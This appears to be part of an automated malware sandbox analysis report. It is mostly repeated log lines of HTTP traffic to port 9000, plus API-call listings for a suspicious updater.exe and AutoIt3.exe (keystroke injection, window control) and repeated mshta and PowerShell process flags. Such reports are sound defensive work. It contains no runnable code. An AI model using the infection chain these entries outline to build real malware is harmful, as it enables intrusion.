                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49779
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49782
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49783
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49786
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49793
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49800
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49802
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49803
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49808
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49812
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49816
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49824
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49828
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49830
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49832
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49833
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49834
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49835
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49836
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49839
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49840
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49841
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49843
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49844
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49845
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49846
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49847
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49849
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49850
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49851
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49852
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49853
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49854
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49855
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49856
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49857
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49861
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49862
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49863
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49864
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49865
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49866
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49867
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49869
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49870
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49871
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49872
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49874
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49876
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49877
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49878
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49879
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49880
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49881
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49882
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49883
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49884
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49885
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49886
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49887
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49889
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49890
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49891
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49894
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49895
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49896
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49897
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49901
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49903
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49904
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49905
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49906
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49907
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49909
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_010459B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,14_2_010459B3
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FD5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_00FD5EDA
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00A259B3
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009B5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_009B5EDA
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_00FE33B7
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
